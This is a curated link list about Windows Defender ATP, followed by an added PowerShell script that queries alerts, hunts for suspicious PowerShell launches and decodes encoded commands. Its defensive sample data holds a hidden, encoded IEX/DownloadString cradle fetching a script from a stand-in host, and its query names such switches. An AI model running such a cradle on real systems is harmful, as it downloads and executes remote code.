Windows Defender ATP
Windows Defender ATP Links
Windows Defender ATP Homepage – Homepage for Windows Defender ATP. You can also start a free trial there.
Video – ATP & WDATP detection sharing – shows how Microsoft 365 Threat Protection shares signals through the Intelligent Security Graph (ISG) to better protect our customers.
Supported Windows Versions
Connectivity Verification Tool – verify client connectivity to WDATP service URLs
Product Area & Features
Automated Investigation & Response – Hexadite
Video – Windows Defender ATP Investigation and Response – This animation shows Windows Defender ATP automated investigation and response: how these capabilities help security teams work their incidents and how they free up time for more advanced hunting and strategic work.
Use Automated investigations to investigate and remediate threats
Overview of Automated investigation
Advanced Threat Hunting (Mine data with custom queries)
Getting Started with WDATP Advanced Hunting – Intro to Advanced Threat Hunting article
Using WDATP Advanced Threat Hunting to find PowerShell scripts that have been executed
Windows Defender ATP Hunting Queries GitHub Repo – This repo contains sample queries for Advanced hunting on Windows Defender Advanced Threat Protection. With these sample queries, you can start to experience Advanced hunting, including the types of data that it covers and the query language it supports. You can also explore a variety of attack techniques and how they may be surfaced through Advanced hunting.
How to query Advanced Threat Hunting for ASR Rules
Kusto Query Language Reference Documentation – Learn how to write advanced hunting queries using this reference guide
M365 Conditional Access based on device risk with Windows Defender ATP – This video shows how the machine risk level, continuously evaluated by WDATP, is used with conditional access. Microsoft Intune receives the device risk level from Windows Defender ATP, and Conditional Access blocks access to business applications when the value does not conform to company policy.
Windows Defender ATP Secure Score – This animated video shows Windows Secure Score: how it helps organizations stay more secure, PowerBI reports for easily looking up CVEs, and how the new Emergency Outbreak Updates get pushed automatically. (The video references the new “Microsoft Secure Score” and “emergency outbreak updates”, which have not been disclosed yet.)
3rd party integration
Ziften Demo with WDATP – In less than 3 minutes, Ziften CPO Mike Hamilton demonstrates the Dynoroot vulnerability exploit, followed by a quick demo of the Windows Defender ATP advanced hunting feature set.
Various conference and Windows Defender ATP Videos
Windows Defender ATP – Unified platform for endpoint security, RSA Conference 2018
Taking Ransomware to task with Windows Defender ATP, RSA Conference 2018
Windows Defender ATP Machine Learning: Detecting new and unusual breach activity, Ignite Sep-2017
Windows Defender ATP Lessons from the Field, TechReady 02-2017
Related Blog Articles
Hunting tip of the month: Downloads originating from email links – 08/30/2018 – This August post builds on the previous hunting tip and discusses more complex queries that join several noisy signals into stronger signals you can use to hunt.
Protecting Windows Servers with Windows Defender ATP – This blog is for enterprise customers who want to use the Windows Defender ATP platform on Windows Server and need practical guidance on what needs to be in place for licensing and infrastructure.
Windows 10 to offer application developers new malware defenses – Application developers can now actively participate in malware defense – in a new way to help protect customers from dynamic script-based malware and non-traditional avenues of cyberattack.
Windows Defender ATP integrates with Microsoft Information Protection to discover, protect, and monitor sensitive data on Windows devices – by integrating with Azure Information Protection, Microsoft’s data classification, labeling, and protection solution. This integration lets Windows natively understand Azure Information Protection sensitivity labels, provide visibility into sensitive data on endpoints, protect sensitive data based on its content, and detect and respond to post-breach malicious activity that involves or affects sensitive data.
WDATP API “Hello World” (using a simple PowerShell script to pull alerts via the WDATP API) – walks you through common automation scenarios you can achieve with Windows Defender ATP to optimize workflows
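The two link groups above, Advanced Hunting (finding executed PowerShell scripts with a Kusto query) and the API “Hello World” (pulling alerts from PowerShell), come together in one added example below. It is not Microsoft’s Hello World script and not code from any of the linked articles. It assumes the 2018-era WDATP endpoints (AAD token from `login.windows.net`, `/api/alerts`, `/api/advancedqueries/run`) and the old hunting schema table `ProcessCreationEvents` with its `EventTime`, `ComputerName`, `AccountName`, `InitiatingProcessFileName` and `ProcessCommandLine` columns; the table and endpoints have since been renamed, so check the current documentation before running it against a tenant. The credential environment variable names and the sample hunting rows are constructed for the example.

```powershell
# Added example (not Microsoft's Hello World script): pull WDATP alerts, run an
# advanced hunting query for PowerShell executions, and decode -EncodedCommand
# payloads found in the results. Endpoint URLs, table and column names are
# assumptions from the 2018-era WDATP API and schema; verify against current docs.
param(
    [string]$TenantId     = $env:WDATP_TENANT_ID,      # assumption: credentials via environment
    [string]$ClientId     = $env:WDATP_CLIENT_ID,
    [string]$ClientSecret = $env:WDATP_CLIENT_SECRET
)

$ApiBase = 'https://api.securitycenter.windows.com'

function Get-WdatpToken {
    param($TenantId, $ClientId, $ClientSecret)
    # AAD client-credentials flow; the app registration needs application permissions
    # for reading alerts and running advanced queries (permission names as documented).
    $body = @{
        grant_type    = 'client_credentials'
        client_id     = $ClientId
        client_secret = $ClientSecret
        resource      = $ApiBase
    }
    $resp = Invoke-RestMethod -Method Post -Uri "https://login.windows.net/$TenantId/oauth2/token" -Body $body
    return $resp.access_token
}

function Get-WdatpAlerts {
    param($Token, [string[]]$Severities = @('High', 'Medium'))
    $headers = @{ Authorization = "Bearer $Token" }
    $alerts  = (Invoke-RestMethod -Method Get -Uri "$ApiBase/api/alerts" -Headers $headers).value
    # Filter client-side so the example does not depend on OData filter syntax.
    return $alerts | Where-Object { $_.severity -in $Severities } |
        Select-Object id, severity, title, machineId, alertCreationTime
}

# KQL for the hunting question "which PowerShell scripts have been executed":
# PowerShell launches whose command line carries common download-and-execute or
# encoding switches. Table and column names are assumptions from the old WDATP schema.
$HuntQuery = @'
ProcessCreationEvents
| where EventTime > ago(7d)
| where FileName in~ ("powershell.exe", "powershell_ise.exe")
| where ProcessCommandLine contains "-enc"
    or ProcessCommandLine contains "EncodedCommand"
    or ProcessCommandLine contains "DownloadString"
    or ProcessCommandLine contains "-nop"
| project EventTime, ComputerName, AccountName, InitiatingProcessFileName, ProcessCommandLine
| top 100 by EventTime desc
'@

function Invoke-WdatpHunt {
    param($Token, [string]$Query)
    $headers = @{ Authorization = "Bearer $Token"; 'Content-Type' = 'application/json' }
    $body    = @{ Query = $Query } | ConvertTo-Json
    return (Invoke-RestMethod -Method Post -Uri "$ApiBase/api/advancedqueries/run" -Headers $headers -Body $body).Results
}

function Expand-EncodedCommand {
    # Decode a -EncodedCommand / -enc / -e payload (base64 of UTF-16LE); $null if none present.
    # "-ExecutionPolicy" does not match because whitespace must follow the switch.
    param([string]$CommandLine)
    if ($CommandLine -match '(?i)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})') {
        try { return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1])) }
        catch { return $null }
    }
    return $null
}

function Get-HuntFindings {
    # Annotate each hunting row with its decoded payload so an analyst sees what actually ran.
    param([object[]]$Rows)
    foreach ($row in $Rows) {
        [pscustomobject]@{
            Time    = $row.EventTime
            Host    = $row.ComputerName
            Account = $row.AccountName
            Parent  = $row.InitiatingProcessFileName
            Command = $row.ProcessCommandLine
            Decoded = Expand-EncodedCommand $row.ProcessCommandLine
        }
    }
}

# Constructed sample rows (not real WDATP output) so the decoding logic runs offline.
$payload = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
$sampleRows = @(
    [pscustomobject]@{ EventTime = '2018-08-30T10:15:00Z'; ComputerName = 'ws01'; AccountName = 'alice'
        InitiatingProcessFileName = 'winword.exe'
        ProcessCommandLine = 'powershell.exe -nop -w hidden -enc ' + [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload)) }
    [pscustomobject]@{ EventTime = '2018-08-30T09:00:00Z'; ComputerName = 'ws02'; AccountName = 'bob'
        InitiatingProcessFileName = 'explorer.exe'
        ProcessCommandLine = 'powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1' }
)
Get-HuntFindings $sampleRows | Format-List

# Live run only when credentials are present.
if ($TenantId -and $ClientId -and $ClientSecret) {
    $token = Get-WdatpToken $TenantId $ClientId $ClientSecret
    Get-WdatpAlerts $token | Format-Table -AutoSize
    Get-HuntFindings (Invoke-WdatpHunt $token $HuntQuery) | Format-List
}
```

Run without credentials and the script only processes the constructed rows: the first row, launched by winword.exe, decodes to the download cradle, while the signed-script launch from explorer.exe yields no decoded payload. With credentials set it additionally lists High and Medium alerts and runs the hunting query live. The `contains` predicates in the query are deliberately broad so that a noisy first pass can be narrowed afterwards, for instance by excluding known management parents such as ccmexec.exe in `InitiatingProcessFileName`.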